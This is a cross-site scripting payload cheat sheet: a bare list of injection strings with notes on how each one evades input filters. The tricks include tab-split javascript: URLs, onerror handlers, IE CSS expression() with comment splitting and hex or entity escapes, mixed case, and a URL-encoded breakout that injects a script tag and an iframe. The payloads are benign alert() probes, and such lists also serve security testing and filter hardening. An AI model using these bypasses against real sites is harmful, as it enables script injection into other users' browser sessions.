<script>alert("XSS")</script> (most common)
<img src=javascript:alert("XSS")></img> (javascript: URL in src; only legacy browsers execute it)
<img src="javascript:alert(/XSS/)"></img>
<img src="javas[TAB]cript:alert(/XSS/)" width=150></img> ([TAB] is a literal Tab character typed inside the scheme; the browser strips it when parsing the URL, a plain string filter looking for "javascript:" does not)
<img src="#" onerror=alert(/XSS/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img> (CSS expression(): IE only)
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/* */ looks like a comment to a filter; the HTML parser treats it as junk between attributes and still reaches onerror)
<img src=vbscript:msgbox("xss")></img> (vbscript: URL: IE only)
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div> (CSS comment splitting the keyword)
<div style={left:\0065\0078ression (alert('xss'))}></div> (CSS hex escapes for "e" and "x")
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div> (entity is decoded before the style attribute is parsed)
Mixed case: <div style="{left:expRessioN (alert('xss'))}"> (defeats a case-sensitive filter)

Breaking out of an array/object context in a URL parameter, then injecting a script tag and an iframe (URL-encoded):
"]}%3Cscript%3Ealert('here again!')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["